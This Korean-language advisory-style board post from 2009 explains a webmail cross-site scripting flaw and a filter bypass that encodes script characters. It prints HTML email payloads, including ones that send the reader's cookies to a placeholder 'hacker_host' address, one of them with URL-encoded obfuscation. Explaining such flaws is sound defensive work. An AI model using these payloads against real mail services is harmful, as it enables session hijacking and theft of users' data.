해킹정보


게시글 '메일 서비스를 통한 Cross Site Script'에 대한 정보
메일 서비스를 통한 Cross Site Script
등록일 2009-11-28 조회 8,130

이스라엘 보안엡체인 GreyMagic Software에서 Yahoo 에 대한 웹메일 취약점을 발견 해당업체에서는 조치를 완료하였으나 같은 취약점이 국내 대부분의 메일시스템에 존재, 매우 취약한것으로 나타났음.


Cross-site Scripting은 악의적인 사용자가 메일 세션에 스크립트 코드를 삽입하여 세션 실행중 코드가 실행되게 한것으로 스크립트 실행코드를 정상적인 문자 대신 문자 코드로 치환하여 보내게 된다.


정상적인 문자로 작성된 스크립트 실행코드를 포함한 메일을 보내면 대부분의 메일서버에서 스크립트 실행 방지를 위해 "javascript:alert()"과 같은 스크립트가 첨부된 메일은 필터링에 의해 필터링된다.


하지만 과거 Unicode 버그와 같이 스크립트 문자를 변환하여 필터링을 우회하는 취약점이 발표되었다.



"javascript:alert()"
"java
script:alert()"
"java
script:alert()"



예를 들어서 외부사용자가 다음과 같은 HTML 스크립트 코드를 포함한 이메일을 보내면 수신측 사용자가 메일을 읽자마자 팝업창이 나타나게 된다.


<div style="background-image:url(javascript:alert("악성코드 자동실행!"))">Hello!</div>


<div style="background-image:url javascript:document.location="http://hacker_host/xss_test/xss_test.jsp?x_cook="+document.cookie;)">.</div>


<div style="background-image:url(javascript:document.location="http://hacker_host/xss_test/xss_test.jsp?x_cook="+%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65;)">.</div>


이를 악용시 사용자가 인지하지 못한채 웜바이러스 유포, 개인정보유출 등의 악성스크립트를 실행할수 있는 충분한 가능성을 내포하고 있다.


현재 국내 대부분의 유명 포탈사이트를 포함, 국가기관 메일서버 등 대부분이 본 취약점에 취약한 것으로 나타났다.